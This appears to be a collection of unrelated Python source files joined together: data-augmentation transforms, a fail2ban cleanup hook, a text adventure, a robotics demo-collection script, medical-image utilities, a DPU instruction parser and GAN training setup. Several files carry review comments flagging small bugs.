    for line in csv.reader(tsv, dialect="excel-tab"): #You can also use delimiter="\t" rather than giving a dialect.
        lineLargest = 0
        # sys.maxint existed only in Python 2; sys.maxsize works on
        # Python 2.6+ and all of Python 3.
        lineSmallest = sys.maxsize
        for valueString in line:
            value = int(valueString)
            if value < lineSmallest:
                lineSmallest = value
            if value > lineLargest:
                lineLargest = value
        difference = lineLargest - lineSmallest
        checksum += difference
        print("largest", lineLargest, "smallest", lineSmallest, "difference", difference, "checksum", checksum)
print("checksum", checksum)
| StarcoderdataPython |
4803282 | <reponame>worms-maker/Python-123
# Declaring variables in Python.
# Python relies on indentation for structure, so consistent formatting matters.
# A variable name may only start with an underscore or a letter;
# other keyboard symbols are not accepted in names.
# Common naming conventions:
# (1) PascalCase : NameOfSchool
# (2) camelCase  : getDataOfTable
# (3) snake_case : name_of_laptop
# NOTE(review): this import is unused -- likely a leftover.
from wsgiref import validate
A = 10
B = 15
B_A = 20
_A = 30
B_ = 40
print(A, B, B_A, _A, B_) # 10 15 20 30 40
# How Python assigns variables internally: id() returns the object's
# identity, so two names bound to the same object share one id.
X = 10
Y = X
print("X :", id(X))
print("Y :", id(Y))
# both variables report the same id
X = 12
print("X :", id(X)) # rebinding X points it at a different object, so the id changes
# Assign one value to multiple variables at once.
E = F = G = 100
print(E, F, G)
# Assign multiple values to multiple variables in one statement.
H, I, J = 12, 23, 34
print(H, I, J)
# type() returns the type of an object.
name = "First Learn then Remove 'L'"
print("NameType :", type(name))
float_A = 1.1
print("float_A_Type :", type(float_A))
# Notes on Python variables:
# - No type keywords (Integer, String, boolean, ...) are needed.
# - Just write the variable name and assign its value.
23854 | """
:filename transformations.py
:author <NAME>
:email <EMAIL>
from
Classes of custom transformations that are applied during the training as additional augmentation of the depth maps.
"""
import torch
import random
import numpy as np
import torch.nn.functional as F
from random import randrange
from skimage.transform import resize, warp, AffineTransform
class Normalize(object):
    """Normalization of a depth map in the value of [0, 1] for each pixel."""

    def __init__(self, input_type):
        # Kind of network input this transform is configured for
        # (e.g. 'geom', 'depth', 'depth+geom').
        self.input_type = input_type

    def __call__(self, sample):
        # NOTE(review): when input_type != 'geom' this falls through and
        # returns None, dropping the sample -- confirm that is intended.
        if self.input_type == 'geom':
            image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
            mean, std = image.mean([1, 2]), image.std([1, 2])
            # TODO?
            # NOTE(review): mean/std are computed but never applied -- the
            # normalization itself appears unimplemented; the sample is
            # returned unchanged.
            return {'image': image,
                    'landmarks': landmarks,
                    'label': label}
class ToTensor(object):
    """Transformation of a training sample into torch tensor instances."""

    def __init__(self, input_type):
        self.input_type = input_type

    def __call__(self, sample):
        tensor_image = torch.from_numpy(sample['image'].copy())
        if self.input_type == 'depth+geom':
            # Multi-channel input: (H, W, C) -> (C, H, W).
            tensor_image = tensor_image.permute(2, 0, 1)
        else:
            # Single-channel input: (H, W) -> (1, H, W) via an
            # inserted channel axis.
            tensor_image = tensor_image.unsqueeze(1).permute(1, 0, 2)
        tensor_landmarks = torch.from_numpy(np.asarray(sample['landmarks']).copy())
        return {'image': tensor_image,
                'landmarks': tensor_landmarks,
                'label': sample['label']}
class Resize(object):
    """Resize either the image or the landmark maps of a sample."""

    def __init__(self, width, height, input_type='image'):
        assert isinstance(width, int)
        assert isinstance(height, int)
        self.width = width
        self.height = height
        self.type = input_type

    def __call__(self, sample):
        image = sample['image']
        landmarks = sample['landmarks']
        target_shape = (self.height, self.width)
        resized_landmarks = landmarks.copy()
        if self.type == 'image':
            image = resize(image, target_shape, anti_aliasing=True)
        if self.type == 'landmarks':
            resized_landmarks = [resize(lm, target_shape, anti_aliasing=True)
                                 for lm in landmarks]
        return {'image': image,
                'landmarks': resized_landmarks,
                'label': sample['label']}
class RandomTranslating(object):
    """Randomly translate the sample by whole pixels with probability p.

    Offsets are drawn independently per axis via randrange(-10, 10),
    i.e. -10..9 pixels, and the same shift is applied to the image and
    every landmark map.
    """

    def __init__(self, p=0.5):
        assert isinstance(p, float)
        self.p = p

    def __call__(self, sample):
        image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
        translated_landmarks = landmarks.copy()
        if np.random.rand(1) < self.p:
            n1 = randrange(-10, 10)
            n2 = randrange(-10, 10)
            t = AffineTransform(translation=(n1, n2))
            # warp() applies the inverse mapping, hence t.inverse here.
            image = warp(image, t.inverse)
            translated_landmarks = []
            for landmark in landmarks:
                translated_landmarks.append(warp(landmark, t.inverse))
        return {'image': image,
                'landmarks': translated_landmarks,
                'label': label}
class RandomScaling(object):
    """Randomly rescale the sample with probability p.

    A single factor is drawn uniformly from [0.90, 1.10] and applied to
    both axes of the image and every landmark map.
    """

    def __init__(self, p=0.5):
        assert isinstance(p, float)
        self.p = p

    def __call__(self, sample):
        image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
        scaled_landmarks = landmarks.copy()
        if np.random.rand(1) < self.p:
            n = random.uniform(0.90, 1.10)
            t = AffineTransform(scale=(n, n))
            # warp() applies the inverse mapping, hence t.inverse here.
            image = warp(image, t.inverse)
            scaled_landmarks = []
            for landmark in landmarks:
                scaled_landmarks.append(warp(landmark, t.inverse))
        return {'image': image,
                'landmarks': scaled_landmarks,
                'label': label}
class RandomRotation(object):
    """Randomly rotate the sample with probability p.

    The angle is pi/n for n drawn from [-32, -7] or [6, 31], i.e. a
    magnitude between roughly 5.6 and 30 degrees in either direction.
    (The module-level claim of +/-11.25 degrees does not match this code.)
    """

    def __init__(self, p=0.5):
        assert isinstance(p, float)
        self.p = p

    def __call__(self, sample):
        image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
        # Pick one divisor from either the negative or positive range.
        rnd_num1 = randrange(-32, -6)
        rnd_num2 = randrange(6, 32)
        rnd_num = random.choice([rnd_num1, rnd_num2])
        if np.random.rand(1) < self.p:
            rotated_image = self.rotate(x=image.unsqueeze(0).type(torch.FloatTensor), theta=np.pi/rnd_num)
            rotated_landmarks = []
            for _, landmark in enumerate(landmarks):
                # Each landmark map gets the same rotation as the image.
                rotated_landmark = self.rotate(x=landmark.unsqueeze(0).unsqueeze(0).type(torch.FloatTensor), theta=np.pi/rnd_num)
                rotated_landmarks.append(rotated_landmark.squeeze(0))
            result = torch.cat(rotated_landmarks, dim=0)
            return {'image': rotated_image.squeeze(0),
                    'landmarks': result,
                    'label': label}
        return {'image': image,
                'landmarks': landmarks,
                'label': label}

    @staticmethod
    def get_rotation_matrix(theta):
        """Return a 2x3 affine rotation matrix tensor for angle theta."""
        theta = torch.tensor(theta)
        return torch.tensor([[torch.cos(theta), -torch.sin(theta), 0],
                             [torch.sin(theta), torch.cos(theta), 0]])

    def rotate(self, x, theta):
        # Rotate the batch x by bilinear resampling through an affine grid.
        rot_mat = self.get_rotation_matrix(theta)[None, ...].repeat(x.shape[0], 1, 1)
        grid = F.affine_grid(rot_mat, x.size(), align_corners=False)
        x = F.grid_sample(x, grid, align_corners=False)
        return x
| StarcoderdataPython |
4841903 | # Copyright (c) <NAME> <<EMAIL>>
# See LICENSE file.
from _sadm.utils import path, systemd
# Public API of this module.
__all__ = ['deploy']

# run as root at last pass
sumode = 'post'

def deploy(env):
    """Remove disabled fail2ban jail configs and restart the service.

    Reads network.fail2ban settings: config.destdir (parent of jail.d)
    and jail.disable (names whose .conf files are deleted if present).
    """
    destdir = env.settings.get('network.fail2ban', 'config.destdir')
    jdisable = env.settings.getlist('network.fail2ban', 'jail.disable')
    for jn in jdisable:
        fn = path.join(destdir, 'jail.d', jn + '.conf')
        if path.isfile(fn):
            env.log("remove %s" % fn)
            path.unlink(fn)
    env.log("restart")
    systemd.restart('fail2ban')
| StarcoderdataPython |
4804568 | <filename>Development Resources/Miscellaneous Content/level1.py
# Player state shared with the level functions below.
health = 100
inventory = []
def level_1(health, inventory):
    """Run the first room of the text adventure.

    Reads commands from stdin in a loop until the player unlocks and passes
    through the door. Returns the (health, inventory) pair, possibly updated
    by events in the room. (Original in-game text, including its spelling,
    is preserved.)
    """
    print("You step into a huge room. The door swings shut behind you.")
    exit_room = False
    door = 'locked'
    sarcophagus = ['medalion', 'key', 'closed']
    while not exit_room:
        action = input("\n> ")
        action = action.lower()
        # Status commands; these fall through to the main command chain.
        if action == 'inventory':
            print(inventory)
        elif action == 'health':
            print(health)
        if action == 'look':
            print("\nThe room you are in is very large and bare.\n",
                  "Directly in front of your there is another door,\n",
                  "much smaller than the first. To you left, there is\n",
                  "a long sarcophagus.")
        elif action == 'inspect door':
            print("\nNext to the door, a skeleton hand protrudes from the wall.\n",
                  "Above the hand, you see the enscription:\n",
                  "\t\t'Tribute'")
        elif action == 'open door':
            if door == 'locked':
                print("\nThe door is locked.")
            elif door == 'unlocked':
                door = 'open'
                print("\nThe door swings open easily, revealing a staircase leading up.")
            else:
                print("Door opened.")
                door = 'open'
        elif action == 'inspect hand':
            print("\nThere is nothing particularly interesting about\n",
                  "the hand. It looks as if it is waiting for somthing")
        elif action == 'inspect sarcophagus':
            print("\nThe sarcophasgus is very elaborate. it is plated\n",
                  "in gold and jewels. On the lid, the words 'A theif's reward'\n",
                  "appear")
        elif action in ('open sarcophagus', 'lift lid'):
            if 'closed' in sarcophagus:
                sarcophagus.remove('closed')
            # Describe whatever is still inside.
            if 'medalion' in sarcophagus and 'key' in sarcophagus:
                print("\nThe lid creaks open. Inside there is an ancient\n",
                      "mummy. Arround the mummy's neck there is a\n",
                      "gold medalion. A small metal key lies next to the mummy")
            elif 'medalion' in sarcophagus:
                print("\nThe lid creaks open. Inside there is an ancient\n",
                      "mummy. Arround the mummy's neck there is a\n",
                      "gold medalion.")
            elif 'key' in sarcophagus:
                print("\nThe lid creaks open. Inside there is an ancient\n",
                      "mummy. A small metal key lies next to the mummy")
            else:
                print("\nThe lid creaks open. Inside there is an ancient\n",
                      "mummy.")
        elif action == 'take medalion':
            if 'medalion' in sarcophagus and 'closed' not in sarcophagus:
                sarcophagus.remove('medalion')
                inventory.append('medalion')
                print("\nYou have added the medalion to your inventory.")
            elif 'medalion' in inventory:
                print("\nYou already have this item.")
        elif action == 'take key':
            if 'key' in sarcophagus and 'closed' not in sarcophagus:
                sarcophagus.remove('key')
                inventory.append('key')
                print("\nYou have added the key to your inventory.")
            # Fixed: this branch previously tested 'medalion' in inventory,
            # so re-taking the key never acknowledged it was already held.
            elif 'key' in inventory:
                print("You already have this item.")
        elif action in ('give medalion', 'place medalion'):
            if 'medalion' in inventory:
                door = 'unlocked'
                print("\nYou cautiously drop the medalion into the skeleton's hand.\n",
                      "The bony fingers crack as they close arround the gold. You\n",
                      "hear a light click behind the door")
        elif action in ('give key', 'place key'):
            if 'key' in inventory:
                print("\nNothing happens. You slide the key back into your pocket")
        elif action == 'shake hand':
            health -= 10
            print("\nYou clasp the skeleton's hand. Suddenly its grip hardens\n",
                  "and you cannot break free. You struggle against the hand.\n",
                  "It loosens its grip and you fall backwards, striking your\n",
                  "head on the stone floor.\n(health - 10)")
        elif action in ('climb stairs', 'climb staircase', 'enter door'):
            if door == 'open':
                print("\nYou ascend the stairs to the next level.")
                exit_room = True
            elif door == 'unlocked':
                print("\nThe door is still closed.")
            else:
                print("\nThe door is locked.")
    return health, inventory
# Run the level, then keep the console window open until enter is pressed.
health,inventory = level_1(health, inventory)
input("Press the enter key to exit.")
| StarcoderdataPython |
3372213 | <filename>morgan_stanley_problems/problem_1.py<gh_stars>0
"""This problem was asked by <NAME>.
In Ancient Greece, it was common to write text with the first line going left to right,
the second line going right to left, and continuing to go back and forth.
This style was called "boustrophedon".
Given a binary tree, write an algorithm to print the nodes in boustrophedon order.
For example, given the following tree:
1
/ \
2 3
/ \ / \
4 5 6 7
You should return [1, 3, 2, 4, 5, 6, 7].
""" | StarcoderdataPython |
3304242 | <filename>ravens_torch/demos.py
# coding=utf-8
# Adapted from Ravens - Transporter Networks, Zeng et al., 2021
# https://github.com/google-research/ravens
"""Data collection script."""
import os
import numpy as np
from absl import app, flags
from ravens_torch import tasks
from ravens_torch.constants import EXPERIMENTS_DIR, ENV_ASSETS_DIR
from ravens_torch.dataset import Dataset
from ravens_torch.environments.environment import Environment
# Command-line flags (absl). Defaults point at the packaged asset and
# experiment directories; 'n' is the number of demonstrations to collect.
flags.DEFINE_string('assets_root', ENV_ASSETS_DIR, '')
flags.DEFINE_string('data_dir', EXPERIMENTS_DIR, '')
flags.DEFINE_bool('disp', False, '')
flags.DEFINE_bool('shared_memory', False, '')
flags.DEFINE_string('task', 'block-insertion', '')
flags.DEFINE_string('mode', 'test', '')
flags.DEFINE_integer('n', 1000, '')
FLAGS = flags.FLAGS
def main(unused_argv):
    """Collect scripted-oracle demonstrations and save completed episodes."""
    # Initialize environment and task.
    env = Environment(
        FLAGS.assets_root,
        disp=FLAGS.disp,
        shared_memory=FLAGS.shared_memory,
        hz=480)
    task = tasks.names[FLAGS.task]()
    task.mode = FLAGS.mode
    # Initialize scripted oracle agent and dataset.
    agent = task.oracle(env)
    dataset = Dataset(os.path.join(
        FLAGS.data_dir, f'{FLAGS.task}-{task.mode}'))
    # Train seeds are even and test seeds are odd.
    seed = dataset.max_seed
    if seed < 0:
        seed = -1 if (task.mode == 'test') else -2
    # Collect training data from oracle demonstrations.
    while dataset.n_episodes < FLAGS.n:
        print(f'Oracle demonstration: {dataset.n_episodes + 1}/{FLAGS.n}')
        episode, total_reward = [], 0
        seed += 2  # keep the even/odd train/test parity
        np.random.seed(seed)
        env.set_task(task)
        obs = env.reset()
        info = None
        reward = 0
        for _ in range(task.max_steps):
            act = agent.act(obs, info)
            # print('Acting...', act)
            # Record the pre-step observation with the chosen action.
            episode.append((obs, act, reward, info))
            obs, reward, done, info = env.step(act)
            total_reward += reward
            print(f'Total Reward: {total_reward} Done: {done}')
            if done:
                break
        # Terminal observation has no action attached.
        episode.append((obs, None, reward, info))
        # Only save completed demonstrations.
        if total_reward > 0.99:
            dataset.add(seed, episode)
# Script entry point: let absl parse the flags and dispatch to main().
if __name__ == '__main__':
    app.run(main)
| StarcoderdataPython |
122661 | <reponame>gyungchan2110/ImageUtils
# In[]
import cv2
import numpy as np
import os
from operator import eq
import random
import matplotlib.pyplot as plt
from skimage import io
import shutil
# Mirror the train/test/validation split recorded under listBase onto the
# original 2k images: every file name found in listBase/<level>/<class> is
# copied from srcBase/<class> into dstBase/<level>/<class>.
listBase = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_2_Generated_Data(2k)/Generated_Data_20180201_091700_2Classes"
srcBase = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/Imgs_OriginalData_2k2k_2Classes"
dstBase = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_2_Generated_Data(2k)/Generated_Data_20180327_151800_2Classes_Original"
levels = ["train", "test", "validation"]
classes = ["Normal", "Abnormal"]
for level in levels:
    for classe in classes:
        split_dir = listBase + "/" + level + "/" + classe
        for name in os.listdir(split_dir):
            src = srcBase + "/" + classe + "/" + name
            dst = dstBase + "/" + level + "/" + classe + "/" + name
            shutil.copy2(src, dst)
# In[]
import cv2
import matplotlib.pyplot as plt
import csv
import SimpleITK as sitk
import os
from skimage import transform,exposure,io
import numpy as np
# Draw lung bounding boxes and anatomical mask outlines on top of each
# original DICOM image listed in the metadata CSV, then save a preview PNG.
metadata = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/BasicData_MetaFile_Ex.csv"
maskPath = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/Masks_OriginalData_OriginalSize"
# Fixed: the "Rib(10)" entry was missing its closing quote, which made this
# whole cell a syntax error.
masks = ["Aortic Knob", "Lt Lower CB", "Pulmonary Conus", "Rt Lower CB", "Rt Upper CB", "DAO", "Carina", "LAA", "Axis", "Thorax(x)", "Thorax(y)", "Diaphragm", "Rib(9)", "Rib(10)"]
f = open(metadata, 'r')
f_reader = csv.reader(f)
for row in f_reader:
    translated = row[2]
    dcm_path = row[0] + "/" + row[1] + "/" + row[1] + ".dcm"
    # Fixed: '.fine(' -> '.find(', and the 'else' was missing its colon.
    if row[0].find("Abnormal") >= 0:
        maskbase = maskPath + "/Abnormal/Total"
    else:
        maskbase = maskPath + "/Normal"
    # Load the DICOM, histogram-equalize and rescale to 0-255.
    img = sitk.ReadImage(dcm_path)
    img = sitk.GetArrayFromImage(img).astype("int16")
    print(img.shape)
    img = exposure.equalize_hist(img)
    img = img[0, :, :]
    img = img * 255
    original = np.asarray(img, dtype="int16")
    original = np.expand_dims(original, -1)
    # Lung segmentation mask (1024x1024) for this image.
    lung_mask = "D:/[Data]/[Lung_Segmentation]/WholeDataSetMask/Whole/" + translated + ".png"
    mask = cv2.imread(lung_mask, 0)
    # TODO(review): 'twok' is used below but never assigned anywhere in this
    # cell -- it presumably held a 2k-resized image; this still raises
    # NameError at runtime until it is defined.
    twok = np.asarray(twok, dtype="uint8")
    print(twok.shape, original.shape)
    # Bounding box of all lung-mask contours, padded by 10px on each side.
    _, mask = cv2.threshold(mask, 127, 255, cv2.THRESH_BINARY)
    _, contours, _ = cv2.findContours(mask, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    rects = [cv2.boundingRect(cnt) for cnt in contours]
    tcomx = 10
    tcomy = 10
    bcomx = 10
    bcomy = 10
    rects.sort()
    top_x = min([x for (x, y, w, h) in rects]) - tcomx
    top_y = min([y for (x, y, w, h) in rects]) - tcomy
    bottom_x = max([x + w for (x, y, w, h) in rects]) + bcomx
    bottom_y = max([y + h for (x, y, w, h) in rects]) + bcomy
    # Scale the 1024-space box to the original image resolution.
    txr = float(top_x) / 1024.
    tyr = float(top_y) / 1024.
    bxr = float(bottom_x) / 1024.
    byr = float(bottom_y) / 1024.
    shape = original.shape
    otx = int(shape[1] * txr)
    oty = int(shape[0] * tyr)
    obx = int(shape[1] * bxr)
    oby = int(shape[0] * byr)
    y_line = (otx + obx) // 2
    # Promote to 3 channels so colored annotations can be drawn.
    original = np.stack([original[:, :, 0], original[:, :, 0], original[:, :, 0]], axis=-1)
    cv2.rectangle(original, (otx, oty), (obx, oby), color=(0, 0, 255), thickness=1)
    cv2.rectangle(original, (y_line - 5, oty), (y_line + 5, oby), color=(255, 255, 0), thickness=1)
    cv2.rectangle(original, (y_line // 2 - 5, oty), (y_line // 2 + 5, oby), color=(255, 255, 255), thickness=1)
    for mask_name in masks:
        # TODO(review): the path ignores 'mask_name', so every iteration reads
        # the same file -- confirm whether the mask name belongs in the path.
        path = maskbase + "/" + translated + ".png"
        mask = cv2.imread(path, 0)
        mask = np.asarray(mask, dtype="uint8")
        _, mask = cv2.threshold(mask, 127, 255, cv2.THRESH_BINARY)
        _, contours, _ = cv2.findContours(mask, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
        cv2.polylines(original, contours, isClosed=True, color=(255, 255, 255), thickness=1)
    cv2.imwrite("D:/TestTemp/" + translated + ".png", original)
    print(translated)
    break
# In[]
import csv
# Read the x-level CSV and report the type of every parsed row.
csvFile = "D:/[Data]/[Cardiomegaly]/1_ChestPA_Labeled_Baeksongyi/[PNG]_1_Basic_Data(2k)/Masks_OriginalData_2k2k/Normal/Thorax(x)/xLevel.csv"
with open(csvFile, 'r', encoding="utf-8", newline='') as f:
    for row in csv.reader(f):
        print(type(row))
# In[]
import numpy as np

# (latitude, longitude) sample points.
Pts = [
    (37.355891, 127.951228),   # Wonju
    (37.086152, 127.039604),   # Osan
    (37.337880, 126.811520),   # Ansan
    (37.452699, 126.909778),   # Geumcheon-gu
    (37.461455, 126.958009),   # dormitory
    (37.461455, 126.958009),   # dormitory 2
    (37.512161, 126.918398),   # Yeongdeungpo
    (40.101099, 360 - 88.230752),
]
latitude = [pt[0] for pt in Pts]
longitude = [pt[1] for pt in Pts]
# Arithmetic mean of the coordinates (naive centroid).
centerPoint = (np.asarray(latitude).mean(), np.asarray(longitude).mean())
print(centerPoint)
1741703 | # List test
# List test, ported from Python 2 print statements to Python 3 print()
# calls (Python 2 is end-of-life; the original did not run on Python 3).
l = []
print(l)
l.append(2)
print(len(l))  # idiomatic replacement for l.__len__()
print(l)
l2 = []
l.append(l2)
print(l)
print(list())
print([1, 2, 3])
3344333 | # Copyright 2021 Xilinx Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .dpuMcParserBase import *
class dpuv4eInstParser(dpuMcParserBase):
    """Machine-code parser for the "DPUCVDX8H_ISA1" (dpuv4e) instruction set.

    Walks a raw instruction stream and accumulates total LOAD image size,
    LOAD parameter size, and SAVE size into ``self.data``.
    """
    def __init__(self, *args, **kwargs):
        # NOTE(review): *args/**kwargs are accepted but not forwarded to the
        # base class -- confirm against dpuMcParserBase's constructor.
        name = "DPUCVDX8H_ISA1"
        super().__init__(name)
        # (mnemonic, opcode, length-in-words) instruction descriptors.
        self.opcode_table = [
            self.inst_desc("LOAD", 0b0000, 5),
            self.inst_desc("SAVE", 0b0100, 4),
            self.inst_desc("CONV", 0b1000, 5),
            self.inst_desc("CONVINIT", 0b1001, 5),
            self.inst_desc("DPTWISE", 0b1010, 5),
            self.inst_desc("DWINIT", 0b1011, 4),
            self.inst_desc("POOLINIT", 0b0110, 3),
            self.inst_desc("POOL", 0b1100, 4),
            self.inst_desc("ELEWINIT", 0b1101, 2),
            self.inst_desc("ELEW", 0b1110, 3),
            self.inst_desc("END", 0b0111, 1)
        ]
    # Packed little-endian bit-field layout of a LOAD instruction.
    # NOTE(review): field order/widths mirror the hardware encoding -- do not
    # reorder without consulting the ISA specification.
    class Load(LittleEndianStructure):
        _pack_ = 1
        _fields_ = [
            ('bank_addr', c_uint, 13),
            ('output_channel_num', c_uint, 7),
            ('dpby', c_uint, 4),
            ('dpdon', c_uint, 4),
            ('opcode', c_uint, 4),
            ('jump_read', c_uint, 16),
            ('bank_id', c_uint, 8),
            ('ddr_mode', c_uint, 1),
            ('pad_idx', c_uint, 5),
            ('r0', c_uint, 2),
            ('channel', c_uint, 12),
            ('mode_avg', c_uint, 2),
            ('length', c_uint, 10),
            ('jump_write', c_uint, 8),
            ('ddr_addr', c_uint, 29),
            ('reg_id', c_uint, 3),
            ('jump_read_endl', c_uint, 21),
            ('pad_end', c_uint, 6),
            ('pad_start', c_uint, 5)
        ]
    # Packed little-endian bit-field layout of a SAVE instruction.
    class Save(LittleEndianStructure):
        _pack_ = 1
        _fields_ = [
            ('bank_addr', c_uint, 13),
            ('r0', c_uint, 7),
            ('dpby', c_uint, 4),
            ('dpdon', c_uint, 4),
            ('opcode', c_uint, 4),
            ('jump_write', c_uint, 16),
            ('bank_id', c_uint, 8),
            ('r1', c_uint, 8),
            ('channel', c_uint, 12),
            ('r2', c_uint, 2),
            ('length', c_uint, 10),
            ('jump_read', c_uint, 8),
            ('ddr_addr', c_uint, 29),
            ('reg_id', c_uint, 3)
        ]
    def process(self, mc, _debug=False):
        """Scan instruction stream *mc* and total the LOAD/SAVE transfer sizes.

        Results land in self.data['load_img_size'], ['load_para_size'] and
        ['save_size']. An unknown opcode zeroes all three and aborts the scan.
        """
        self.debug = _debug
        pos = 0
        load_img_size = 0
        load_para_size = 0
        save_size = 0
        while (pos < len(mc)):
            inst_name, inst_len = self.get_inst(mc, pos, self)
            if self.debug:
                print("pos: %d/%d, inst: %s " %
                      (pos, len(mc), inst_name), end="\r")
            if inst_name == "LOAD":
                # Overlay the Load bit-field struct onto the raw bytes.
                l = self.Load()
                inst = mc[pos:]
                memmove(addressof(l), inst, inst_len)
                load_bank_id = l.bank_id
                load_len = l.length
                load_channel = l.channel + 1
                load_jr = l.jump_read+1
                inst_load_img_size = 0
                inst_load_para_size = 0
                # Bank ids below 16 are counted as feature-map loads; higher
                # banks as parameter loads (see the LOAD_FM/LOAD_PARA traces).
                if load_bank_id < 16:
                    inst_load_img_size = load_len * load_jr + load_channel
                    # print("LOAD_FM:bank_id:%d, load_jr:%d, load_len:%d, load_channel:%d, %d" % \
                    #     (load_bank_id, load_jr, load_len, load_channel, inst_load_img_size))
                else:
                    inst_load_para_size = l.output_channel_num * l.jump_read_endl
                    # print("LOAD_PARA:bank_id:%d, load_jr:%d, load_len:%d, load_channel:%d, %d" % \
                    #     (load_bank_id, load_jr, load_len, load_channel, inst_load_para_size))
                load_img_size += inst_load_img_size
                load_para_size += inst_load_para_size
            elif inst_name == "SAVE":
                s = self.Save()
                inst = mc[pos:]
                memmove(addressof(s), inst, inst_len)
                length_ = s.length + 1
                chan_ = s.channel + 1
                save_size += (length_ * chan_)
                #print("SAVE %d %d" % (length_, chan_))
            elif inst_name == "UNKNOW":
                # Decoding failed; discard partial totals.
                load_img_size = 0
                load_para_size = 0
                save_size = 0
                break
            else:
                pass
            pos += inst_len
        self.data["load_img_size"] = load_img_size
        self.data["load_para_size"] = load_para_size
        self.data["save_size"] = save_size
# Instantiate and register the parser with the global parser registry.
register(dpuv4eInstParser())
| StarcoderdataPython |
1682129 | <reponame>liweileev/SOMGAN
'''
Author: Liweileev
Date: 2022-01-03 17:00:02
LastEditors: Liweileev
LastEditTime: 2022-01-31 01:10:10
'''
import click
import dnnlib
import os
import re
import json
import torch
import tempfile
from training import training_loop
from torch_utils import training_stats
from torch_utils import custom_ops
class UserError(Exception):
    """Raised for invalid command-line option values or combinations."""
def setup_training_loop_kwargs(
    gpus = None, # Number of GPUs: <int>, default = 1 gpu
    snap = None, # Snapshot interval: <int>, default = 50 ticks
    # Dataset.
    data = None, # Training dataset (required): <path>
    mirror = None, # Augment dataset with x-flips: <bool>, default = False
    # Base config.
    gamma = None, # Override R1 gamma: <float>
    kimg = None, # Override training duration: <int>
    batch = None, # Override batch size: <int>
    # Discriminator augmentation.
    aug = None, # Augmentation mode: 'ada' (default), 'noaug', 'fixed'
    num_d = None, # Number of discriminators: <int>, default = 1
    topo = None, # Topology constraint type: 'grid' (default), 'triangle'
    # Transfer learning.
    resume = None, # Load previous network: 'noresume' (default), <file>, <url>
):
    """Validate CLI options and build the kwargs for training_loop().

    Returns (run_desc, args): a human-readable experiment name and a
    dnnlib.EasyDict of training_loop keyword arguments.

    Raises UserError for invalid option values or combinations.
    """
    args = dnnlib.EasyDict()
    # ------------------------------------------
    # General options: gpus, snap, metrics
    # ------------------------------------------
    if gpus is None:
        gpus = 1
    assert isinstance(gpus, int)
    if not (gpus >= 1 and gpus & (gpus - 1) == 0):
        raise UserError('--gpus must be a power of two')
    args.num_gpus = gpus
    if snap is None:
        snap = 50
    assert isinstance(snap, int)
    if snap < 1:
        raise UserError('--snap must be at least 1')
    args.image_snapshot_ticks = snap
    args.network_snapshot_ticks = snap
    args.metrics = ['fid50k_full']
    # -----------------------------------
    # Dataset: data, mirror
    # -----------------------------------
    assert data is not None
    assert isinstance(data, str)
    args.training_set_kwargs = dnnlib.EasyDict(class_name='training.dataset.ImageFolderDataset', path=data, xflip=False)
    args.data_loader_kwargs = dnnlib.EasyDict(pin_memory=True, num_workers=3, prefetch_factor=2)
    # Instantiate the dataset once to validate the path and read resolution.
    try:
        training_set = dnnlib.util.construct_class_by_name(**args.training_set_kwargs) # subclass of training.dataset.Dataset
        args.training_set_kwargs.resolution = training_set.resolution # be explicit about resolution
        desc = training_set.name
        del training_set # conserve memory
    except IOError as err:
        raise UserError(f'--data: {err}')
    if num_d is None:
        num_d = 1
    assert isinstance(num_d, int)
    args.num_D = num_d
    desc += f'-{num_d:d}D'
    assert topo is None or isinstance(topo, str)
    if topo is None:
        desc += '-grid'
        args.topo = 'grid'
    else:
        desc += '-' + topo
        args.topo = topo # custom path or url
    if mirror is None:
        mirror = False
    if mirror:
        desc += '-mirror'
        args.training_set_kwargs.xflip = True
    # ------------------------------------
    # Base config: cfg, gamma, kimg, batch
    # ------------------------------------
    # Resolution-dependent defaults (heuristics in the comments below).
    res = args.training_set_kwargs.resolution
    fmaps = 1 if res >= 512 else 0.5
    lrate = 0.002 if res >= 1024 else 0.0025
    default_map = 2
    default_kimg = 25000
    default_mb = max(min(gpus * min(4096 // res, 32), 64), gpus) # keep gpu memory consumption at bay
    default_mbstd = min(default_mb // gpus, 4) # other hyperparams behave more predictably if mbstd group size remains fixed
    default_gamma = 0.0002 * (res ** 2) / default_mb # heuristic formula
    default_ema = default_mb * 10 / 32
    args.G_kwargs = dnnlib.EasyDict(class_name='training.Generators.StyleGenerator.Generator', z_dim=512, w_dim=512, mapping_kwargs=dnnlib.EasyDict(), synthesis_kwargs=dnnlib.EasyDict())
    args.D_kwargs = dnnlib.EasyDict(class_name='training.Discriminators.StyleDiscriminator.Discriminator', epilogue_kwargs=dnnlib.EasyDict())
    args.G_kwargs.synthesis_kwargs.channel_base = args.D_kwargs.channel_base = int(fmaps * 32768)
    args.G_kwargs.synthesis_kwargs.channel_max = args.D_kwargs.channel_max = 512
    args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 4 # enable mixed-precision training
    args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = 256 # clamp activations to avoid float16 overflow
    args.G_kwargs.mapping_kwargs.num_layers = default_map
    args.D_kwargs.epilogue_kwargs.mbstd_group_size = default_mbstd
    args.G_opt_kwargs = dnnlib.EasyDict(class_name='torch.optim.Adam', lr=lrate, betas=[0,0.99], eps=1e-8)
